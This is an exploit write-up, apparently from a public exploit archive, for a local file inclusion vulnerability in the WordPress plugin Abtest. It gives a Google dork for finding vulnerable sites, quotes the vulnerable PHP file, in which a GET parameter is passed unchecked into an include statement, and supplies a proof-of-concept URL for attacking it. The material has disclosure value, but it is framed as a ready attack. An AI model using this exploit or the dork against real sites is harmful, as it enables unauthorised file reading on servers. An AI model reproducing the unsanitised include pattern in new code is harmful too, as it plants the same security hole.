WordPress Abtest Local File Inclusion

`# Exploit Title: Wordpress Plugin Abtest - Local File Inclusion  
# Date: 2016-03-19  
# Google Dork : inurl:/wp-content/plugins/abtest/  
# Exploit Author: CrashBandicot  
# Vendor Homepage: https://github.com/wp-plugins/abtest  
# Tested on: Chrome  
  
  
# Vulnerable File : abtest_admin.php  
  
<?php   
  
require 'admin/functions.php';   
  
if (isset($_GET['action'])) {  
  
include 'admin/' . $_GET['action'] . '.php';  
  
} else {  
  
include 'admin/list_experiments.php';   
}  
?>  
  
# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]  
  
# Pics : http://i.imgur.com/jZFKYOc.png  
`